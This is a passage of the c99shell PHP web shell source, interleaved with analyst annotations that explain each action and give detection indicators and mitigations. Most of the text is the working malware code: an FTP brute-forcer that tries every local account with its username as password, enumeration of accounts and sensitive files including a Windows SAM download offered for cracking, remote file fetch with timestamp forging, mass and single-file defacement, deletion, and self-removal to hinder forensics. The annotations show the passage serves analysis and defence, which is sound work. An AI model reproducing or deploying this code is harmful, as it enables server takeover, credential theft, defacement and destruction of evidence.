933 if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
934 else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
935 }
936 mysql_free_result($result);
937 if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
938 }
939 }
940 }
941 }
942 }
943 echo "</tr></table></table>";
944}
// Analyst annotation: action "mkdir". Creates the directory named in $mkdir unless it
// equals the current directory $d or already exists, reports failure as
// "access denied", and then falls through to the directory listing (act "ls").
// The path is used as received; only the echoed copy is HTML-escaped.
// Defender note: directories created this way are owned by the account PHP runs as,
// which helps when separating attacker-created paths from deployed content.
945if ($act == "mkdir")
946{
947 if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
948 echo "<br><br>";
949 $act = $dspact = "ls";
950}
// Analyst annotation: action "ftpquickbrute" (non-Windows only). What the visible code
// does: it reads /etc/passwd line by line and, for each account, tries one FTP login
// against localhost port 21 using the account name as the password, with a 1-second
// connect timeout. The number of lines read is bounded by $fqb_lenght (default
// $nixpwdperpage, set elsewhere), and a summary with timing is printed at the end.
// Defender note: in FTP daemon logs this appears as a rapid run of login attempts from
// the loopback address, one per local account, in /etc/passwd order. Loopback
// traffic is often exempt from rate limiting and ban rules, so check that those
// controls cover 127.0.0.1. Password policy that rejects password == username, or
// disabling password FTP altogether, removes the exposure.
951if ($act == "ftpquickbrute")
952{
953 echo "<b>Ftp Quick brute:</b><br>";
954 if ($win) {echo "This functions not work in Windows!<br><br>";}
955 else
956 {
// Helper: when $fqb_onlywithsh is set, only accounts whose shell field $sh is in the
// listed set are tried. Returns true after a successful ftp_login(); otherwise falls
// off the end and returns nothing. Connection and login errors are suppressed with @.
957 function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
958 {
959 if ($fqb_onlywithsh)
960 {
961 if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
962 else {$true = true;}
963 }
964 else {$true = true;}
965 if ($true)
966 {
967 $sock = @ftp_connect($host,$port,$timeout);
968 if (@ftp_login($sock,$login,$pass))
969 {
970 echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
971 ob_flush();
972 return true;
973 }
974 }
975 }
// Driver: runs only after the form below has been submitted ($submit set).
// getmicrotime() is a timing helper defined elsewhere in the file.
976 if (!empty($submit))
977 {
978 if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
979 $fp = fopen("/etc/passwd","r");
980 if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
981 else
982 {
983 ob_flush();
984 $i = $success = 0;
985 $ftpquick_st = getmicrotime();
986 while(!feof($fp))
987 {
// Field 0 of a passwd line is the account name, field 6 the login shell.
988 $str = explode(":",fgets($fp,2048));
989 if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
990 {
991 $success++;
992 }
993 if ($i > $fqb_lenght) {break;}
994 $i++;
995 }
996 if ($success == 0) {echo "No success. connections!";}
997 $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
998 echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
999 }
1000 }
// No submission yet: print the POST form (fields fqb_lenght, fqb_onlywithsh, submit).
1001 else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell? <input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";}
1002 }
1003}
// Analyst annotation: action "lsa" prints a host reconnaissance summary: OS and server
// software, the safe-mode and open_basedir status strings ($hsafemode, $hopenbasedir,
// computed elsewhere), then platform-specific checks.
// Defender note: the files probed below are a checklist of what should not be
// readable by the account PHP runs as: cPanel's /etc/userdomains and
// /var/cpanel/accounting.log, the Apache configuration, and on Windows the SAM backup
// under the repair directory. Access-log indicators are "act=lsa" and "nixpasswd=".
1004if ($act == "lsa")
1005{
1006 echo "<center><b>Server security information:</b></center>";
1007 echo "<b>Software:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
1008 echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
1009 echo "<b>Open base dir: ".$hopenbasedir."</b><br>";
1010 if (!$win)
1011 {
// Account enumeration: instead of opening /etc/passwd, this walks a UID range of
// $nixpwdperpage entries starting at $nixpasswd (the value 1 is treated as 0) and
// prints each posix_getpwuid() record joined with ":". Where the posix functions are
// not needed by the application, php.ini's disable_functions can remove them.
1012 if ($nixpasswd)
1013 {
1014 if ($nixpasswd == 1) {$nixpasswd = 0;}
1015 $num = $nixpasswd + $nixpwdperpage;
1016 echo "<b>*nix /etc/passwd:</b><br>";
1017 $i = $nixpasswd;
1018 while ($i < $num)
1019 {
1020 $uid = posix_getpwuid($i);
1021 if ($uid) {echo join(":",$uid)."<br>";}
1022 $i++;
1023 }
1024 }
1025 else {echo "<br><a href=\"".$surl."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
// Each probe reads the whole file with file_get_contents() only to test readability,
// then prints a link to the script's file viewer (act=f) for that path.
1026 if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
1027 if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
1028 if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
1029 if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
1030 }
1031 else
1032 {
// Windows: builds a path under $_SERVER["WINDIR"] for the SAM backup in the repair
// directory and prints one of two messages depending on whether
// file_get_contents() returns content; one of them carries a download link (act=f).
1033 $v = $_SERVER["WINDIR"]."\repair\sam";
1034 if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
1035 else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+.</font></b><br>";}
1036 }
1037}
// Analyst annotation: action "mkfile". Creates an empty file at $mkfile by opening it
// with mode "w" (the handle is not closed here), unless the path equals $d or already
// exists. On success it switches to the file action ("f") with $d/$f pointing at the
// new file; when $mkfile equals $d it falls back to the directory listing.
// Defender note: files created this way are owned by the account PHP runs as and
// appear with fresh timestamps. File-integrity monitoring on the web root catches
// them, and a web root that account cannot write to prevents them.
1038if ($act == "mkfile")
1039{
1040 if ($mkfile != $d)
1041 {
1042 if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
1043 elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
1044 else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
1045 }
1046 else {$act = $dspact = "ls";}
1047}
// Analyst annotation: action "fsbuff" shows the copy/cut "clipboard". It merges the
// "copy" and "cut" lists from $sess_data (populated elsewhere in the file; its storage
// is not visible in this excerpt) and, when the merged list is non-empty, hands it to
// the directory-listing code through $ls_arr with full paths displayed.
1048if ($act == "fsbuff")
1049{
1050 $arr_copy = $sess_data["copy"];
1051 $arr_cut = $sess_data["cut"];
1052 $arr = array_merge($arr_copy,$arr_cut);
1053 if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
1054 else
1055 {
1056 echo "<b>File-System buffer</b><br><br>";
1057 $ls_arr = $arr;
1058 $disp_fullpath = true;
1059 $act = "ls";
1060 }
1061}
// Analyst annotation: action "selfremove". With $submit set, the script deletes its own
// file (unlink(__FILE__)), clears the output buffer, prints a farewell line and exits.
// Without $submit it prints a confirmation row: eight "NO" links and one "YES" link in
// shuffled order, the YES link requesting act=selfremove&submit=1 after a confirm().
// Defender note: this is an anti-forensics step, so the script may no longer be on
// disk when the investigation starts. Evidence then has to come from elsewhere:
// access-log entries containing "act=selfremove&submit=1", file-integrity or audit
// records of the deletion, and backups or snapshots that still hold the file.
1062if ($act == "selfremove")
1063{
1064 if (!empty($submit))
1065 {
1066 if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }
1067 else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
1068 }
1069 else
1070 {
1071 $v = array();
1072 for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$surl."\"><u><b>NO</b></u></a>";}
1073 $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$surl."act=selfremove&submit=1';\"><u>YES</u></a>";
1074 shuffle($v);
1075 $v = join(" ",$v);
1076 echo "<b>Self-remove: ".__FILE__." <br>Are you sure?</b><center>".$v."</center>";
1077 }
1078}
// Analyst annotation: action "massdeface". The visible code fills in defaults, builds a
// search specification in $a (name pattern, text pattern and match flags), calls
// c99fsearch() for every ";"-separated path in $deface_in, and sends any matches to
// the directory-listing code through $ls_arr. c99fsearch() is defined elsewhere and
// appears to communicate through the $a and $found variables set here. The excerpt
// itself never writes to a file and never reads $deface_html or $deface_preview after
// collecting them, so where content is replaced, if anywhere, cannot be told from here.
// Defender note: indicators are POST requests carrying deface_name, deface_in,
// deface_text and deface_html fields. If the default $deface_html is what gets
// written, altered pages would contain the marker "Mass-defaced with c99shell v.".
// Recovery means restoring content from a known-good source, not editing files in place.
1079if ($act == "massdeface")
1080{
1081 if (empty($deface_in)) {$deface_in = $d;}
1082 if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
1083 if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
1084
1085 if (!empty($submit))
1086 {
1087 $found = array();
1088 $found_d = 0;
1089 $found_f = 0;
1090
1091 $text = $deface_text;
1092 $text_regexp = $deface_text_regexp;
1093 if (empty($text)) {$text = " "; $text_regexp = 1;}
1094
// Note: "text_regexp" is filled from $text_regxp, a different name from the
// $text_regexp assigned just above.
1095 $a = array
1096 (
1097 "name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
1098 "text"=>$text, "text_regexp"=>$text_regxp,
1099 "text_wwo"=>$deface_text_wwo,
1100 "text_cs"=>$deface_text_cs,
1101 "text_not"=>$deface_text_not
1102 );
1103 $defacetime = getmicrotime();
1104 $in = array_unique(explode(";",$deface_in));
1105 foreach($in as $v) {c99fsearch($v);}
1106 $defacetime = round(getmicrotime()-$defacetime,4);
1107 if (count($found) == 0) {echo "<b>No files found!</b>";}
1108 else
1109 {
1110 $ls_arr = $found;
1111 $disp_fullpath = true;
1112 $act = $dspact = "ls";
1113 }
1114 }
1115 else
1116 {
1117 if (empty($deface_preview)) {$deface_preview = 1;}
1118 if (empty($deface_html)) {$deface_html = "</div></table><br>Mass-defaced with c99shell v. ".$shver.", coded by tristram[<a href=\"http://ccteam.ru\">CCTeaM</a>].</b>";}
1119 }
// The form is printed on every request for this action; user-supplied values are
// HTML-escaped before being placed back into it. gchds() is a helper defined elsewhere.
1120 echo "<form method=\"POST\">";
1121 if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
1122 echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
1123<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\"> <input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
1124<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
1125<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
1126<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
1127 <input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
1128 <input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
1129 <input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
1130<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
1131<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
1132<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
1133 if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
1134}
// Analyst annotation: action "search", a recursive file finder. It defaults the search
// root to the current directory and the name pattern to "(.*)", builds the search
// specification in $a, calls c99fsearch() (defined elsewhere; it appears to read $a
// and fill $found) for each ";"-separated root in $search_in, and passes the matches
// to the directory-listing code with full paths shown.
// Defender note: on a compromised host this is how an operator typically locates
// configuration files and stored credentials by name or content. Indicators are POST
// requests with search_name, search_in and search_text fields. Anything the account
// PHP runs as could read should be treated as exposed when scoping the incident.
1135if ($act == "search")
1136{
1137 if (empty($search_in)) {$search_in = $d;}
1138 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
1139 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
1140
1141 if (!empty($submit))
1142 {
1143 $found = array();
1144 $found_d = 0;
1145 $found_f = 0;
// Note: "text_regexp" is filled from $search_text_regxp, a different name from the
// $search_text_regexp the form field and the default above use.
1146 $a = array
1147 (
1148 "name"=>$search_name, "name_regexp"=>$search_name_regexp,
1149 "text"=>$search_text, "text_regexp"=>$search_text_regxp,
1150 "text_wwo"=>$search_text_wwo,
1151 "text_cs"=>$search_text_cs,
1152 "text_not"=>$search_text_not
1153 );
1154 $searchtime = getmicrotime();
1155 $in = array_unique(explode(";",$search_in));
1156 foreach($in as $v)
1157 {
1158 c99fsearch($v);
1159 }
1160 $searchtime = round(getmicrotime()-$searchtime,4);
1161 if (count($found) == 0) {echo "<b>No files found!</b>";}
1162 else
1163 {
1164 $ls_arr = $found;
1165 $disp_fullpath = true;
1166 $act = $dspact = "ls";
1167 }
1168 }
// The form is printed on every request for this action; user-supplied values are
// HTML-escaped before being placed back into it. gchds() is a helper defined elsewhere.
1169 echo "<form method=\"POST\">
1170<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
1171<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\"> <input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
1172<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
1173<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
1174<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
1175 <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
1176 <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
1177 <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
1178<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
1179 if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
1180}
// Handler for act=chmod in this web shell: shows or changes the permission bits of the file $d.$f.
// NOTE(analyst): $d, $f, $submit and the owner/group/world arrays are not assigned in this block;
// presumably they come from request parameters (the form below posts owner[n], group[n], world[n]) - confirm.
// Detection/mitigation: permission changes made by the web-server account on files under the
// document root are rarely legitimate, so they are a useful audit event; keeping the document root
// owned by a different account than the PHP runtime limits what this handler can change.
1181if ($act == "chmod")
1182{
1183 $perms = fileperms($d.$f);
1184 if (!$perms) {echo "Can't get current mode.";}
1185 elseif ($submit)
1186 {
 // Unchecked boxes are not submitted, so missing r/w/x entries are defaulted to 0 before summing.
1187 if (!isset($owner[0])) {$owner[0] = 0;}
1188 if (!isset($owner[1])) {$owner[1] = 0; }
1189 if (!isset($owner[2])) {$owner[2] = 0;}
1190 if (!isset($group[0])) {$group[0] = 0;}
1191 if (!isset($group[1])) {$group[1] = 0;}
1192 if (!isset($group[2])) {$group[2] = 0;}
1193 if (!isset($world[0])) {$world[0] = 0;}
1194 if (!isset($world[1])) {$world[1] = 0;}
1195 if (!isset($world[2])) {$world[2] = 0;}
 // One digit per class (4=read, 2=write, 1=execute per the form values), concatenated behind a leading "0".
1196 $sum_owner = $owner[0] + $owner[1] + $owner[2];
1197 $sum_group = $group[0] + $group[1] + $group[2];
1198 $sum_world = $world[0] + $world[1] + $world[2];
1199 $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
 // The concatenated digit string is passed to chmod(); "@" hides PHP warnings, so a failure
 // shows only as the message below and leaves nothing in the PHP error log.
1200 $ret = @chmod($d.$f, $sum_chmod);
1201 if ($ret) {$act = "ls";}
1202 else {echo "<b>Changing file-mode (".$d.$f.")</b>: error<br>";}
1203 }
1204 else
1205 {
 // No submit yet: render the checkbox form, pre-ticked from the permission string returned by
 // view_perms() (defined elsewhere; the indexing below reads characters 1-9 of it).
1206 echo "<b>Changing file-mode</b><br>";
1207 $perms = view_perms(fileperms($d.$f));
1208 $length = strlen($perms);
1209 $owner_r = $owner_w = $owner_x =
1210 $group_r = $group_w = $group_x =
1211 $world_r = $world_w = $group_x = "";
1212
1213 if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
1214 if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
1215 if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
1216 if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
1217 if ($perms[9] == "x") {$world_x = " checked";}
1218 echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'>
1219<input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error>
1220<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error>
1221<table><tr><td><table align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br>
1222<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br>
1223<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td><b>Group</b><br><br>
1224<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br>
1225<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br>
1226<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td>
1227<td><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br>
1228<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br>
1229<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td>
1230</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"Save\"></td></tr></table></FORM>";
1231 }
1232}
// Handler for act=upload in this web shell: writes a file onto the server, either from a
// multipart form upload (field "uploadfile") or by fetching a remote URL (field "uploadurl").
// NOTE(analyst): $d, $submit, $uploadpath, $uploadurl, $uploadfilename, $userfilename, $miniform and
// $filestealth are not assigned in this block; presumably request parameters or config - confirm.
// Mitigation: both paths need a directory writable by the PHP runtime account; a read-only document
// root, no PHP execution in writable directories, and outbound egress filtering on the web server
// each break this handler. The URL path relies on PHP URL wrappers, which allow_url_fopen=Off disables.
1233if ($act == "upload")
1234{
 // Destination directory: backslashes normalised, defaults to the current directory, trailing "/" enforced.
1235 $uploadmess = "";
1236 $uploadpath = str_replace("\\","/",$uploadpath);
1237 if (empty($uploadpath)) {$uploadpath = $d;}
1238 elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
1239 if (!empty($submit))
1240 {
 // Path 1: multipart upload, read through the legacy $HTTP_POST_FILES array and moved into place.
1241 global $HTTP_POST_FILES;
1242 $uploadfile = $HTTP_POST_FILES["uploadfile"];
1243 if (!empty($uploadfile[tmp_name]))
1244 {
1245 if (empty($uploadfilename)) {$destin = $uploadfile[name];}
1246 else {$destin = $userfilename;}
1247 if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!<br>";}
1248 }
 // Path 2: remote fetch. The target name is the supplied file name, else derived below with an
 // "index[_n].html" fallback.
1249 elseif (!empty($uploadurl))
1250 {
1251 if (!empty($uploadfilename)) {$destin = $uploadfilename;}
1252 else
1253 {
1254 $destin = explode("/",$destin);
1255 $destin = $destin[count($destin)-1];
1256 if (empty($destin))
1257 {
1258 $i = 0;
1259 $b = "";
1260 while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
1261 }
 // Only URLs containing http://, https:// or ftp:// are accepted. eregi() was removed in PHP 7.0, so
 // on newer runtimes this line raises a fatal "undefined function" error; that message in PHP error
 // logs is worth alerting on as a sign of a legacy shell being exercised.
1262 if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
1263 else
1264 {
 // Server-side fetch of the URL; "@" suppresses warnings, so failures leave no PHP log entry.
1265 $st = getmicrotime();
1266 $content = @file_get_contents($uploadurl);
1267 $dt = round(getmicrotime()-$st,4);
1268 if (!$content) {$uploadmess .= "Can't download file!<br>";}
1269 else
1270 {
 // Forensics: with $filestealth set, the target's timestamps are read before the write and put back
 // afterwards with touch() ($stat[9] = mtime, $stat[8] = atime), so mtime/atime on an overwritten file
 // cannot be trusted during triage. touch() does not set the inode change time, so on Unix
 // filesystems ctime is the better pivot, along with file-integrity-monitoring hashes.
1271 if ($filestealth) {$stat = stat($uploadpath.$destin);}
1272 $fp = fopen($uploadpath.$destin,"w");
1273 if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
1274 else
1275 {
1276 fwrite($fp,$content,strlen($content));
1277 fclose($fp);
1278 if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
1279 }
1280 }
1281 }
1282 }
1283 }
 // Output: the compact mode prints only the status message and falls through to the listing;
 // otherwise the full upload form is rendered. Its field names (uploadfile, uploadurl, uploadpath,
 // uploadfilename, uploadautoname) are stable literals for static and request-body signatures.
1284 if ($miniform)
1285 {
1286 echo "<b>".$uploadmess."</b>";
1287 $act = "ls";
1288 }
1289 else
1290 {
1291 echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=\"POST\">
1292Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br> or<br>
1293Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
1294Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
1295File-name (auto-fill): <input name=uploadfilename size=25><br><br>
1296<input type=checkbox name=uploadautoname value=1 id=df4> convert file name to lovercase<br><br>
1297<input type=\"submit\" name=\"submit\" value=\"Upload\">
1298</form>";
1299 }
1300}
// Handler for act=delete in this web shell: passes every entry of $actbox to fs_rmobj() and then
// falls through to the directory listing.
// NOTE(analyst): $actbox is not assigned in this block (presumably the selected paths from the
// listing form), and fs_rmobj() is defined elsewhere in the file - confirm what it removes there.
// Detection/recovery: bulk unlink activity by the web-server account under the document root is
// the observable effect; restoring depends on backups or version control, since nothing is kept here.
1301if ($act == "delete")
1302{
1303 $delerr = "";
1304 foreach ($actbox as $v)
1305 {
1306 $result = false;
1307 $result = fs_rmobj($v);
1308 if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
1309 if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
1310 }
1311 $act = "ls";
1312}
// Handler for act=deface in this web shell: overwrites every file listed in $actbox with the
// template held in $deface_html.
// NOTE(analyst): $actbox and $deface_html are not assigned in this block; presumably they are
// request parameters (selected paths and the submitted template) - confirm.
// Detection: the placeholder tokens %%%filedata%%%, %%%filename%%% and %%%filepath%%% are
// distinctive literals for static signatures; the runtime effect is a burst of in-place rewrites of
// web content by the web-server account, which file-integrity monitoring on the document root catches.
// Mitigation/recovery: a document root the PHP runtime cannot write to stops the overwrite; files
// are replaced in place with no copy kept, so recovery needs backups or a redeploy from version control.
1313if ($act == "deface")
1314{
1315 $deferr = "";
1316 foreach ($actbox as $v)
1317 {
 // Template expansion: %%%filedata%%% becomes the file's current contents, %%%filename%%% its base
 // name and %%%filepath%%% its path. eregi() was removed in PHP 7.0, so on newer runtimes this line
 // raises a fatal "undefined function" error that is worth alerting on in PHP error logs.
1318 $data = $deface_html;
1319 if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
1320 $data = str_replace("%%%filename%%%",basename($v),$data);
1321 $data = str_replace("%%%filepath%%%",$v,$data);
 // Mode "w" truncates the target before writing; "@" suppresses the warning if the open fails.
1322 $fp = @fopen($v,"w");
1323 fwrite($fp,$data);
1324 fclose($fp);
1325 if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";}
1326 if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;}
1327 }
1328}
1329if (!$usefsbuff)
1330{
1331 if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
1332}
1333else
1334{
1335 if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";}
1336 if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
1337 if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";}
1338
1339 if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
1340 el